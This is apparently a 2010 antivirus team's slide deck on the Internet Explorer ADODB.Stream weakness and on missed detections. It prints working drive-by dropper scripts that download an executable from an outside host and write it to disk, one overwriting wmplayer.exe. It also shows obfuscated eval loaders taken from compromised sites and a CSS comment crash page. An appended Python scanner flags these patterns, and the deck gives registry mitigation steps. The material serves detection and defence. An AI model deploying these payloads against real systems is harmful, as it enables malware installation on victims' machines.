Shasta Console Operations. February 2010 Tony Caleb. Agenda. MSIE ADODB. Stream Object Installation Weakness. AV/IS FN Detection. Dynamic Analysis. Introduction. - PowerPoint PPT Presentation
Shasta Console Operations
February 2010, Tony Caleb
Agenda
Dynamic Analysis
AV/IS FN Detection
MSIE ADODB.Stream Object Installation Weakness
Introduction
MSIE ADODB.Stream Object Installation Weakness is a BROWSER EXPLOIT that allows attackers to attack a system through the browser, install their ActiveX controls and take over the victim's system.
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening. - SYMANTEC
ADODB.stream provides a method for reading and writing files on a hard drive. This by-design functionality is sometimes used by web applications. However, when combined with known security vulnerabilities in Microsoft Internet Explorer, it could allow an internet web site to execute script from the Local Machine Zone (LMZ). This occurs because the ADODB.Stream object allows access to the hard drive when hosted within Internet Explorer. - MICROSOFT
This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker-specified file to the victim file system. – SECURITY FOCUS
How does it occur?
Microsoft Internet Explorer is prone to a security weakness that may permit malicious HTML documents to create or overwrite files on a victim file system when interpreted from the Local Zone (or other Security Zones with relaxed security restrictions, such as the Intranet Zone).
What does it do on an infected machine?
This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker-specified file to the victim file system. In this manner, an HTML document that is interpreted in the context of a Security Zone with relaxed security restrictions may install a malicious file on the victim file system.
The stream object contains several methods for reading and writing binary files and text files. When this by-design functionality is combined with known security vulnerabilities in Microsoft Internet Explorer, an Internet Web site could execute script from the Local Machine zone. This behavior occurs because the ADODB.Stream object permits access to the hard disk when the ADODB.Stream object is hosted in Internet Explorer.
The error that is displayed on the page while the script executes (it makes the user think that an error has simply occurred and the page did not load, while the malicious content is downloaded to the system without the user's knowledge).
error.jsp is a JSP page that consists of one line, namely
<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>
(just to send a false header to IE)
Sample Code
<script language="VBScript">
const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET", "http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE", false
xmlHTTP.send
contents = xmlHTTP.responseBody
Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open
oStr.Write(contents)
oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite
</script>
How a file is downloaded onto a victim's system
Sample Code
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://attacker/trojan.exe", 0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe", 2);
location.href = "mms://";
How this exploit can be carried out through wmplayer.exe
Modification of wmplayer.exe
<script language="javascript">
function preparecode(code) {
  result = '';
  lines = code.split(/\r\n/);
  for (i = 0; i < lines.length; i++) {
    line = lines[i];
    if (line != '') {
      result += line + '\\r\\n';
    }
  }
  return result;
}
function doit() {
  mycode = preparecode(document.all.code.value);
  myURL = "file:javascript:eval('" + mycode + "')";
  window.open(myURL, "_media");
}
window.open("error.jsp", "_media");
setTimeout("doit()", 5000);
</script>
Code for the modification of Windows Media Player
How to Overcome This Issue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}
Changing the keys in the Registry
Disabling of ActiveX controls
Disable ActiveX controls of any kind in the IE security settings, so that nothing can be downloaded by itself (in older versions of Internet Explorer this is not possible).
Changing the keys in the Registry
1. Close any open Internet Explorer browser windows.
2. Click Start, and then click Run.
3. In the Open box, type Regedit, and then click OK.
4. In Registry Editor, locate the following registry key:
5. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility
6. Right-click ActiveX Compatibility, point to New, and then click Key.
7. Type the following name for the key:
8. {00000566-0000-0010-8000-00AA006D2EA4}
9. Close Registry Editor.
Samples of FN Detection
MSIE Event Object Mem Corruption Code Exec
HTTP MSIE Style Tag Cmt Mem Corruption
The domain "khan.co.kr" with URL http://gallery.khan.co.kr/ is found to have the above threat, but during manual analysis of this URL NIS does not detect it. Here the hackers have bypassed the AV/IS.
This is a common FN that we find with IS. Here a script that redirects to malicious links is given in encoded form; since the redirect link is not active at the time NIS sees it, it is not detected, but the link changes dynamically. This clearly proves that the malicious content was inserted intentionally, since the script tag is present after the closing html tag.
Trojan.Malscript.B
The domain Voy.com with the URL http://www.voy.com//76583 is found to have the above threat, but during manual analysis of this URL the AV/IS fail to detect it.
MSIE Event Object Mem Corruption Code Exec
Code in the index2.html
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g a=1b;g 2="%u";g1B="%2E%w%2t%c%2w"+2+"b";g 10="%P%34%h%39"+2+"6";g 1l="%C%B%A%h%36";g 1C="%2Y%2Q%2P%2T%1P%1W";g s=a("%1O%1L"+2+"6%M%1H%1F%K%1E%1K"+2+"6%1a%1N%2m%2a%S%4b"+2+"b%4a");s+=a("%q%N%y%49"+2+"6%41%f%k%4w"+2+"6%4r%q%N%y%4s"+2+"6%3s%f%k");s+=a("%3w"+2+"6%3V%q%N%y%1y"+2+"6%3E%f%k%3I"+2+"6%3H%1s%17%3G%M%16");s+=a("%19%1e%r%k%4c"+2+"6%R%1s%17%3J%M%16%19%3A%r%k%3B"+2+"6%R");s+=a("%3C%3D"+2+"6%1a%3L%3S%3T%3U%3R%3Q%3M%3N%3O%3P%3z%3y%3i%3j%3k"+"F"+"0"+"5");s+=a("%3l%3h%3g%3c%3d%3e"+2+"6%3f%X%3m%1c%J%L%3n%15%3u");s+=a("%L%3v%1c%J%L%3t%15%3o%3p%W%P%3q%f%3r%14%1e%q");s+=a("%k%3X"+2+"6%Q%4t%4u%4v%4q%4m%4n%4o%4p%X%4x%4E%4F%4G");s+=a("%4D%4C%W%12%1z%4y%4z%4A%4B%4l%4k%44%1z%46%47%43%42");s+=a("%3Y%3Z"+2+"6%40%14%P"+10+"%4g"+2+"6%4h%4i"+2+"6%4j");s+=a("%4f"+2+"b%m%4e"+2+"6%12%11%11%l%3b%4d%4H%2U%27%28%29%u"+"4"+"1"+"9"+"0");s+=a("%26%25%21%22%23%24%2b"+2+"b%c%2c"+2+"b%2j%2k%2l%1y%2i"+2+"b");s+=a("%18%1f%1r%2h"+2+"6%h%2d"+2+"6%l%1q%1t%1u%1x%2e"+2+"6%1w%
1v");s+=a("%S%2f"+2+"6%20"+2+"6%K%S%1V"+2+"b%1G%1J%1f%1r%1M"+2+"6%h%1I");s+=a(""+2+"6%l%1q%1t%1u%1x%1Z"+2+"6%1w%1v%1X%1Y%1U%1T%R%1Q"+2+"b");s+=a("%1R%1S%2g%Q%3a%2o%2V%2W%2X"+2+"6%l%Q%2S%2O%U%2R%2Z");s+=a("%37%38"+2+"6%35%30%31%32%33%2N%2M%r%K%2x%y%2y"+2+"6%l");s+=a("%2z%2v%1d%w%J%2u%2q%2p%2r%2s"+2+"6%l%z%2A%2B%f"+2+"6");s+=a("%2I%2J"+2+"6%2K%2L%2H%1n%w%1k%2G%v%1j%2C%r%1g%2D"+2+"b");s+=a("%1h"+2+"b%1i%d%2F%45%5k%76"+1l+""+2+"b%h%75"+2+"6");s+=a("%4I%v%m%E"+2+"b%z%I%78%79%U%74%73%C%B%A%h%6Z");s+=a(""+2+"b%h%6Y"+2+"6%70%v%m%E"+2+"b%z%I%71%72%U%7b%7j%C");s+=a("%B%A%h%7m"+2+"b%h%7i"+2+"6%7h%v%m%E"+2+"b%z%I%7g%6X");s+=a("%6W%1n%w%1k%6E%6D%1j%6F%f%1g%6G"+2+"b%1h"+2+"b%1i%6H%c");s+=a("%6C"+2+"6%6B%6x%6w%6y%f%e%d%c%6z"+2+"6%6A%6I%6J%6S%f");s+=a("%e%d%c%6R"+2+"6%6T%6U%6V%6Q%f%e%d%c%6P"+2+"6%6L%6K");s+=a("%6M%7o%f%e%d%c%6N"+2+"6%6O%7n%7x%86%f%e%d%c%7R");s+=a(""+2+"b%7Q%87%7W%7X%f%e%d%c%7Y"+2+"6%7Z%7V%7U%7P%f%e");s+=a("%d%c%7S"+2+"6%7T%80%81%88%f%e%d%c%82"+2+"b%83%84%85");s+=a("%7N%f%e%d%c%7w"+2+"b%7O%7y%Z%7z%f%e%d%c%7v"+2+"6");s+=a("%7u%7q%7p%7r"+2+"6%e%d%c%7s"+2+"6%7t%7A%7B%7J"+2+"6%e%
HTTP MSIE Style Tag Cmt Mem Corruption
The /* comment is only closed after the end of the style tag, that is, after 80,000 lines of garbage. Because of this inserted junk the memory stack overflows and, as a result, the entire browser crashes.
<!-- google_ad_section_start --><style type=text/css>body{background-repeat:repeat;background-color:black;background-image:none;color:black;visibility:hidden;font-size:10000;line-height:10000;letter-spacing:10000;text-decoration:blink;text-align:right;margin-top:10000;}form{visibility:hidden;}table{visibility:hidden;}a{visibility:hidden;}img{visibility:hidden;}input{visibility:hidden;}</style><A rel=nofollow target=_blank HREF=https:???????????????????????????????????????????? > <style>@; /*<<BR>
URL : hxxp://www.voy.com//76583/
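A static triage check for the patterns described above (the ADODB.Stream file drop from the sample code, a packed script injected after the closing html tag, and a style tag whose /* comment is never closed). This is an added example written for this page, not code from the slides; the sample pages are constructed and the rule names are my own.

```python
import re

# Constructed sample pages (not from the original slides). Each shows one of the
# patterns the slides describe: an ADODB.Stream file drop, a packed script injected
# after the closing html tag, and a <style> block whose /* comment is never closed.
SAMPLES = {
    "adodb_drop": (
        '<html><body><script>'
        'var x = new ActiveXObject("Microsoft.XMLHTTP");'
        'x.Open("GET", "http://example.invalid/file.exe", 0); x.Send();'
        'var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open();'
        's.Write(x.responseBody); s.SaveToFile("C:\\\\file.exe", 2);'
        '</script></body></html>'
    ),
    "post_html_packer": (
        '<html><body>normal page</body></html>\n'
        "<script>eval(function(p,a,c,k,e,d){return p}('x',1,1,'y'.split('|'),0,{}))</script>"
    ),
    "style_bomb": (
        '<html><style type=text/css>body{visibility:hidden;}</style>'
        '<a href="#"><style>@; /*' + 'x' * 200 + '</style>'
    ),
    "clean": (
        '<html><head><style>body{color:black} /* ok */</style></head>'
        '<body><script>document.title = "ok";</script></body></html>'
    ),
}

STYLE_BLOCK = re.compile(r'<style[^>]*>(.*?)</style>', re.I | re.S)
PACKER = re.compile(r'eval\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*d\s*\)')

def has_unterminated_style_comment(html):
    """True if any <style> block opens a /* comment it never closes."""
    return any(body.count('/*') > body.count('*/') for body in STYLE_BLOCK.findall(html))

def script_after_html_close(html):
    """True if a <script> tag appears after the last </html>."""
    low = html.lower()
    end = low.rfind('</html>')
    return end != -1 and '<script' in low[end:]

def scan(html):
    """Return the names of all heuristics that fire on the given page text."""
    low = html.lower()
    findings = []
    if 'adodb.stream' in low and 'savetofile' in low:
        findings.append('adodb-stream-file-drop')      # stream object writing to disk
    if 'microsoft.xmlhttp' in low and 'responsebody' in low:
        findings.append('xmlhttp-binary-fetch')        # binary body fetched for the drop
    if PACKER.search(html):
        findings.append('packer-eval-wrapper')         # eval(function(p,a,c,k,e,d)...) wrapper
    if script_after_html_close(html):
        findings.append('script-after-html-close')     # injected after the page proper
    if has_unterminated_style_comment(html):
        findings.append('unterminated-style-comment')  # style tag comment bomb
    return findings

def scan_samples():
    return {name: scan(page) for name, page in SAMPLES.items()}
```

Running `scan_samples()` reports two findings for the file-drop page, two for the post-html packed script, one for the style bomb and none for the clean page.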
Manual Analysis
How we do the manual analysis
Tools we use for manual analysis
Samples
Tools Used for Manual Analysis
HTTP Analyzer
TCP Viewer
Process Explorer
Systracer (System Tracer)
Startup programs (msconfig, services.msc)
HTTP Malicious Toolkit Variant Activity
From URL:
<script language=JavaScript>
function bfbn15(p) {
  var h = p.length, k = 1024, s, i, c, z = 0, d = 0, j = 0,
      t = Array(63,31,62,3,50,13,56,52,26,53,0,0,0,0,0,0,30,58,61,15,25,14,41,59,1,51,47,10,54,29,24,57,43,49,42,34,19,55,38,28,32,20,40,0,0,0,0,46,0,17,48,18,44,36,22,5,7,35,11,37,2,27,0,8,39,23,6,33,45,16,21,9,60,4,12);
  for (i = Math.ceil(h / k); i > 0; i--) {
    c = '';
    for (s = Math.min(h, k); s > 0; s--, h--) {
      j |= (t[p.charCodeAt(z++) - 48]) << d;
      if (d) {
        c += String.fromCharCode(129 ^ (j & 255));
        j >>= 8;
        d -= 2;
      } else {
        d = 6;
      }
    }
    eval(c);
  }
}
bfbn15('Li2GkG_BJK1BXqCB4IPFgG2GemR_kG_67IEOJq0PLCCA9T@RVLjApCC6dT@ZJ3EGeIm_pC2OXj@Z4CJ6xE8A9q1xGARPV3@Be1PAJS2GpG_P9GRJVRKIXq1AJEJG70@OF4z69p2PI32GkGEGFSARUfm_QSRRVVGOi1E6SmRRVE8ZLi@O9pEJbVmdsVEOZm@A9IPdUrRx9i1GeIGZki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl')
</script>
After Decoding
Thank You